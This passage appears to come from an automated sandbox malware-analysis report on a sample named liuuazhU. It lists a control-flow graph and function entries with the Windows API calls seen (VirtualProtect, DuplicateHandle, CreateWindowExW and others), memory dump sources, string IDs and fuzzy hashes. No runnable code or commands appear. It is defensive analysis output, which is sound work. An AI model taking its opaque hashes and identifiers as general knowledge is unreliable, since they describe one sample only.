                                                                                        control_flow_graph 3234 2e4cd3e8-2e4cd409 3235 2e4cd40b 3234->3235 3236 2e4cd410-2e4cd446 3234->3236 3235->3236 3239 2e4cd44f-2e4cd476 3236->3239 3241 2e4cd47c-2e4cd494 3239->3241 3242 2e4cd687-2e4cd690 3239->3242 3245 2e4cd632-2e4cd64d 3241->3245 3247 2e4cd499-2e4cd626 3245->3247 3248 2e4cd653-2e4cd6a0 3245->3248 3259 2e4cd631 3247->3259 3255 2e4cd627 3248->3255 3256 2e4cd6a2-2e4cd6c8 3248->3256 3255->3259 3257 2e4cd6cf-2e4cd994 3256->3257 3258 2e4cd6ca 3256->3258 3299 2e4ce30a-2e4ce320 3257->3299 3258->3257 3259->3245 3300 2e4cd999-2e4cd9a2 3299->3300 3301 2e4ce326-2e4ce364 3299->3301 3302 2e4cd9a9-2e4cd9c7 3300->3302 3303 2e4cd9a4 3300->3303 3304 2e4ce2fd-2e4ce303 3302->3304 3305 2e4cd9cd-2e4cd9ef 3302->3305 3303->3302 3304->3299 3307 2e4ce305 3304->3307 3310 2e4ce2e0-2e4ce2f6 3305->3310 3307->3299 3312 2e4ce2fc 3310->3312 3313 2e4cd9f4-2e4cd9fd 3310->3313 3312->3304 3314 2e4cd9ff 3313->3314 3315 2e4cda04-2e4cdbe1 3313->3315 3314->3315 3329 2e4cdbe7-2e4cdbf3 3315->3329 3330 2e4ce2a3-2e4ce2c2 3315->3330 3331 2e4cdc93-2e4cdca9 3329->3331 3335 2e4ce2c4-2e4ce2d0 3330->3335 3336 2e4ce2d1 3330->3336 3333 2e4cdcaf-2e4cdd95 3331->3333 3334 2e4cdbf8-2e4cdc01 3331->3334 3355 2e4cdd9c-2e4cddf8 3333->3355 3356 2e4cdd97 3333->3356 3337 2e4cdc08-2e4cdc39 3334->3337 3338 2e4cdc03 3334->3338 3335->3336 3336->3310 3342 2e4cdc7d-2e4cdc89 3337->3342 3343 2e4cdc3b-2e4cdc7c 3337->3343 3338->3337 3345 2e4cdc8b 3342->3345 3346 2e4cdc90 3342->3346 3343->3342 3345->3346 3346->3331 3358 2e4cddff-2e4cde03 3355->3358 3359 2e4cddfa 3355->3359 3356->3355 3360 2e4cde05-2e4cde11 3358->3360 3361 2e4cde13-2e4cde1d 3358->3361 3359->3358 3362 2e4cde4a-2e4cdef8 3360->3362 3363 2e4cde1f 3361->3363 3364 2e4cde24-2e4cde44 3361->3364 3371 2e4cdefe-2e4cdf92 3362->3371 3372 2e4ce099-2e4ce0dc 3362->3372 3363->3364 3364->3362 3382 2e4cdf99-2e4cdff5 3371->3382 3383 2e4cdf94 3371->3383 3377 2e4ce0dd-2e4ce2a2 3372->3377 3377->3330 3386 2e4cdffc-2e4ce000 3382->3386 3387 2e4cdff7 3382->3387 3383->3382 3388 2e4ce010-2e4ce01a 3386->3388 3389 2e4ce002-2e4ce00e 3386->3389 3387->3386 3392 2e4ce01c 3388->3392 3393 2e4ce021-2e4ce041 3388->3393 3391 2e4ce047-2e4ce097 3389->3391 3391->3377 3392->3393 3393->3391
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D)C.$D)C.$D)C.
                                                                                        • API String ID: 0-1439639639
                                                                                        • Opcode ID: 6028694659aca3ce73f7f7a715757be4620504e666ede871926a07b86ac7a09d
                                                                                        • Instruction ID: 043150d8284f5a44c0d0ace4322efaf1d2f361fa69c9796a4eec28e82bbe3ee3
                                                                                        • Opcode Fuzzy Hash: 6028694659aca3ce73f7f7a715757be4620504e666ede871926a07b86ac7a09d
                                                                                        • Instruction Fuzzy Hash: 6171F274E00218CFDB24DFA5C994BADBBB2BF88304F2084A9D909AB355DB355A85CF41
                                                                                        Function 2E7CD581 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 253COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(?), ref: 2E7CD812
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID: 86}.
                                                                                        • API String ID: 4139908857-1920637956
                                                                                        • Opcode ID: 9852ef7a6ac0b6b9f5c7bfca02059ee66864acb798b2468a94426acdcf836fbd
                                                                                        • Instruction ID: 58e354b35297e2d5176880425a89233d3f2384d8e068eb78e0b60a813cebdb16
                                                                                        • Opcode Fuzzy Hash: 9852ef7a6ac0b6b9f5c7bfca02059ee66864acb798b2468a94426acdcf836fbd
                                                                                        • Instruction Fuzzy Hash: CEA16770A007488FCB20CF69D080B9ABBF5BF99350F00992AD58AEB761D734E945CF91
                                                                                        Function 2E4C1079 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,bq$,bq
                                                                                        • API String ID: 0-2699258169
                                                                                        • Opcode ID: 087a8a57baf1c9c167615e360f4a02d8dadc8904a45f65e0f11f62b809611a46
                                                                                        • Instruction ID: a545b43e3903fbec938d8ac3aad52074a30807a922cb2502ec46826a907867e9
                                                                                        • Opcode Fuzzy Hash: 087a8a57baf1c9c167615e360f4a02d8dadc8904a45f65e0f11f62b809611a46
                                                                                        • Instruction Fuzzy Hash: CB81923CA006058FCB04CFA9C884959B7F1FFAA214B15926BD51AE7365DB35EC41CBA1
                                                                                        Function 2E4C0BB8 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Hbq$Hbq
                                                                                        • API String ID: 0-4258043069
                                                                                        • Opcode ID: 7f5a290a0038e8b285ea83e7a545aa57df3f8b0df3c6eb5cefdce9c11d273742
                                                                                        • Instruction ID: 985d6a08e34d3a695ae1a7b1cefd0c73820887b7ea3ff5126e15cf301d6fefa8
                                                                                        • Opcode Fuzzy Hash: 7f5a290a0038e8b285ea83e7a545aa57df3f8b0df3c6eb5cefdce9c11d273742
                                                                                        • Instruction Fuzzy Hash: 5C51D3383042548FDB058F25C894BAE7BE6FF99304F14846AE945CB396DB78E841CB91
                                                                                        Function 2E4CD3D8 Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: D)C.$D)C.
                                                                                        • API String ID: 0-3676446386
                                                                                        • Opcode ID: 0542ee53ba6716760eeceb143dae52022227be357ae24fd8218cd9656f867ffa
                                                                                        • Instruction ID: 1f78c2b08630b9108b14f97d50c02d36ec88e88caf634238b9fe481ddb073b96
                                                                                        • Opcode Fuzzy Hash: 0542ee53ba6716760eeceb143dae52022227be357ae24fd8218cd9656f867ffa
                                                                                        • Instruction Fuzzy Hash: FF314574D01218DFDB14CFB6D8947DEBBB2AF89304F20942AD819BB241DB78554ACF52
                                                                                        Function 2E7CF8F0 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2E7CFAB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 55235653586a4af0fee100f324aae784e921d6bdc5283a722b1ee50469f99606
                                                                                        • Instruction ID: 67f985c96c49c4aaefaa80ad0f76645111c4b4685267fe20d661d4c8ae562b0b
                                                                                        • Opcode Fuzzy Hash: 55235653586a4af0fee100f324aae784e921d6bdc5283a722b1ee50469f99606
                                                                                        • Instruction Fuzzy Hash: A3716AB4D00218DFDF20CFA9D980ADDBBF5BB19304F10A1AAE958A7225D7319A85CF45
                                                                                        Function 2E7C4C20 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2E7C4CF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: b8069bc150f01254c14aeda934b0cc96155111125845b5b873cab0bd353eec64
                                                                                        • Instruction ID: 37668fd89547cbe4d969ef27ad0e32fd23d823ff43d0493a616c5694e0affc61
                                                                                        • Opcode Fuzzy Hash: b8069bc150f01254c14aeda934b0cc96155111125845b5b873cab0bd353eec64
                                                                                        • Instruction Fuzzy Hash: AF4166B9D002589FCB10CFA9D984ADEBBF5BB19310F14906AE918BB320D335A945CF54
                                                                                        Function 2E7C4C28 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2E7C4CF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 69ad52d21ae060b24ca48d064aca7efec512cd49ff33c6235aee730cebd28437
                                                                                        • Instruction ID: eff2b46697dc3bd969df0c7b2694d452141b5ca3c1d943402386b0233199a139
                                                                                        • Opcode Fuzzy Hash: 69ad52d21ae060b24ca48d064aca7efec512cd49ff33c6235aee730cebd28437
                                                                                        • Instruction Fuzzy Hash: CE4156B9D002589FCB10CFAAD984ADEBBF5BB19310F14906AE918BB320D335A945CF54
                                                                                        Function 2A6BEF78 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 2A6BF01C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3115757303.000000002A6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A6B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2a6b0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 606d3310017048eb188e45728b19cee7eb5e8e2a22cb490c17ff6ce29bd389ee
                                                                                        • Instruction ID: cade892478e9187cbdad163e0b113bf48cd702ce74ba43a0e831d2d67df52379
                                                                                        • Opcode Fuzzy Hash: 606d3310017048eb188e45728b19cee7eb5e8e2a22cb490c17ff6ce29bd389ee
                                                                                        • Instruction Fuzzy Hash: 253197B5D012589FCF14DFA9D980ADEFBF0BB49310F20942AE814B7224D735A945CF58
                                                                                        Function 2E821DC0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 2E821E81
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120296894.000000002E820000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E820000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e820000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallProcWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2714655100-0
                                                                                        • Opcode ID: e01f55bd4073f38475a1dce30e8f99602b91d0b238930aa9f2186df5e77cf6f7
                                                                                        • Instruction ID: a242aa82880e958824e5cef81f41d4144c4f2fb35b2cd7c6d3c129ffc35461f5
                                                                                        • Opcode Fuzzy Hash: e01f55bd4073f38475a1dce30e8f99602b91d0b238930aa9f2186df5e77cf6f7
                                                                                        • Instruction Fuzzy Hash: 61412CB8900745CFCB14CF99C888AAABBF5FF98314F24C459D558A7321D734A881CFA0
                                                                                        Function 2E7CD780 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(?), ref: 2E7CD812
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 1b3130cfa9a615febd40d09ed621f2ab111d39c23ce4c505279e349e0ac82208
                                                                                        • Instruction ID: 44accd5a35a53e066d96d88e3a6f9ead9184c10f17d31212513a11fde0fc0388
                                                                                        • Opcode Fuzzy Hash: 1b3130cfa9a615febd40d09ed621f2ab111d39c23ce4c505279e349e0ac82208
                                                                                        • Instruction Fuzzy Hash: 5D3199B4D00259DFCB14CFAAD584ADEFBF5AB49310F14906AE918B7320D334A945CFA4
                                                                                        Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                        • SysAllocString.OLEAUT32 ref: 00401898
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocString_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 959018026-0
                                                                                        • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                        • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                        • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                        • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                        Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 10892065-0
                                                                                        • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                        • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                        • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                        • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                        Function 2E4C2D7F Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: 91490576682c8cfad66ae34613d9d9b092c055896ddf89ad7af1839b29876c74
                                                                                        • Instruction ID: 6e0aa51696075495fc7651b0052a35717e60087df72bfc8ed678d0697b3e7fa3
                                                                                        • Opcode Fuzzy Hash: 91490576682c8cfad66ae34613d9d9b092c055896ddf89ad7af1839b29876c74
                                                                                        • Instruction Fuzzy Hash: 4B417C386006059FCB05DF69C894AAA7BF5FF58B00F11406AE909DB3A2CBB4DD41CBA5
                                                                                        Function 2E4C30C8 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4'^q
                                                                                        • API String ID: 0-1614139903
                                                                                        • Opcode ID: bdc1de7a7c01d8d01e8362fc1da331a3b22e277500c7f76497327fdc940d6adc
                                                                                        • Instruction ID: 48bb3fef3c5fb141a5823edaa6670b29adcb8bfc5efdd2642bea3557260ba8b6
                                                                                        • Opcode Fuzzy Hash: bdc1de7a7c01d8d01e8362fc1da331a3b22e277500c7f76497327fdc940d6adc
                                                                                        • Instruction Fuzzy Hash: 9821F739704196DFD704CF668C90AABBBE9ABA5218F0090ABE949C7341DF75E841CB74
                                                                                        Function 2A6BF248 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CloseHandle.KERNELBASE(?), ref: 2A6BF2C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3115757303.000000002A6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A6B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2a6b0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: 7aec89355fa156de72087e847214d78a5577ca44bd1e903ac7aeae2caa8061f7
                                                                                        • Instruction ID: df5931f9adf3764d649eeaf30200389638cb2c254ea3147579a58addbb2722af
                                                                                        • Opcode Fuzzy Hash: 7aec89355fa156de72087e847214d78a5577ca44bd1e903ac7aeae2caa8061f7
                                                                                        • Instruction Fuzzy Hash: 1631BBB4D012189FCB14DFAAE980ADEFBF4AF49310F10942AE814B7310C735A941CF98
                                                                                        Function 2E4C4120 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22133c8a15ab3806e25cd7ea78303e530d81c86e0b9d2e45bc214cfc4be49936
                                                                                        • Instruction ID: b97cca5ee266dbaead60b98260b467d4960f07d80e654f38dec84cf3eae71445
                                                                                        • Opcode Fuzzy Hash: 22133c8a15ab3806e25cd7ea78303e530d81c86e0b9d2e45bc214cfc4be49936
                                                                                        • Instruction Fuzzy Hash: 3AD1F879B002148FDB04CF99D69499DBBF6BF98710B66909AE509EB371CB34EC41CB60
                                                                                        Function 2E4C4001 Relevance: .3, Instructions: 306COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f8121afd523d565719fa3746f585eb146af74b2bd59f424e5a82d86b060f601c
                                                                                        • Instruction ID: dcf3ad71f79c74304e254f89282b93b4d40ee7b42d4c8f3a04c92d6eae23f736
                                                                                        • Opcode Fuzzy Hash: f8121afd523d565719fa3746f585eb146af74b2bd59f424e5a82d86b060f601c
                                                                                        • Instruction Fuzzy Hash: 1BD11C79E002188FDB04CFA9CA8499DBBF6FF99310B559096E519AB371CB34ED41CB60
                                                                                        Function 2E4C0D30 Relevance: .2, Instructions: 222COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1791d437c4b82c96564a3325d731cd8c5a49a93951f36b031bcee5101c0e59bc
                                                                                        • Instruction ID: d06e5042206cd530dbef38b2a3ec7282b7a256b0d672d77b100a918cadf854a7
                                                                                        • Opcode Fuzzy Hash: 1791d437c4b82c96564a3325d731cd8c5a49a93951f36b031bcee5101c0e59bc
                                                                                        • Instruction Fuzzy Hash: 6671D2383002118FC7059F39C4A4A6EBBA6AFD8314F14857AE946CB395DF78EC42CB91
                                                                                        Function 2E4C2F81 Relevance: .2, Instructions: 182COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 89765f5e6df386a5775651caf633a7b7007a5546dbe976bc5abe6db64720f723
                                                                                        • Instruction ID: 208b89a3d89e1939310ef1876cd650ed8bb66451c48dcb618e3ea5a510b75829
                                                                                        • Opcode Fuzzy Hash: 89765f5e6df386a5775651caf633a7b7007a5546dbe976bc5abe6db64720f723
                                                                                        • Instruction Fuzzy Hash: 6251BE3A3142158FC704DF3AC894D6A7BE9AF9964830594FBE909CB366DB21EC01CB64
                                                                                        Function 2E4CFD81 Relevance: .1, Instructions: 135COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4923e87325845cb5740a0f36de63ee0b2f322b8ce98a8a0a6c608e6bbc2e47ea
                                                                                        • Instruction ID: af49fde906269b5968f10d6510ea28aca2e06fdda4eec356b078046e7fca418f
                                                                                        • Opcode Fuzzy Hash: 4923e87325845cb5740a0f36de63ee0b2f322b8ce98a8a0a6c608e6bbc2e47ea
                                                                                        • Instruction Fuzzy Hash: 14518535D0021A9FCB00DFE0D854ADDFBBAFF9A304F248216F515AB2A5DB74A945CB50
                                                                                        Function 2E4C5411 Relevance: .1, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cc84d2dcd5c8a4d5d4f25060cfcf2e29d0eafe8de5bd6636daf4b47e2f1d7ab3
                                                                                        • Instruction ID: 49f2fb36d6e6e3853eb1059af58a38a8ad763af45fdd7e8ea4534d81d99a3839
                                                                                        • Opcode Fuzzy Hash: cc84d2dcd5c8a4d5d4f25060cfcf2e29d0eafe8de5bd6636daf4b47e2f1d7ab3
                                                                                        • Instruction Fuzzy Hash: C341E274E042188BDB24CFBAC8507DEBBF2AF99304F10D0AAD508B7255DB345986CF55
                                                                                        Function 28C7D005 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3114604081.0000000028C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 28C7D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_28c7d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b8dee547cb6bf8e03d2098fa5b5a8637671a5bf9ab44a97a231424e052a4b19c
                                                                                        • Instruction ID: e11e9bfe040c5eb24decb47874ed4b19e1bb13828815ca321163941a27359ab8
                                                                                        • Opcode Fuzzy Hash: b8dee547cb6bf8e03d2098fa5b5a8637671a5bf9ab44a97a231424e052a4b19c
                                                                                        • Instruction Fuzzy Hash: 12214D7110E3C09FC7038B24D994701BF75EB46214F29C5DBD9888F2A7C33A984ACB62
                                                                                        Function 28C7D030 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3114604081.0000000028C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 28C7D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_28c7d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 379b830a4270612faaf0a20d99c15426c8f4c8e28f6c16741ae8b1a297c93bb2
                                                                                        • Instruction ID: 98f7c6bb95e66e25ee2b24a9ad82ae42e477edfedd55bba9157398b5b6e8386c
                                                                                        • Opcode Fuzzy Hash: 379b830a4270612faaf0a20d99c15426c8f4c8e28f6c16741ae8b1a297c93bb2
                                                                                        • Instruction Fuzzy Hash: 5D21F271504204DFCB00DF14EAC0F16BBB9EB88314F24C569DA494B3DAC33AE847CA62
                                                                                        Function 2E4C3E49 Relevance: .1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
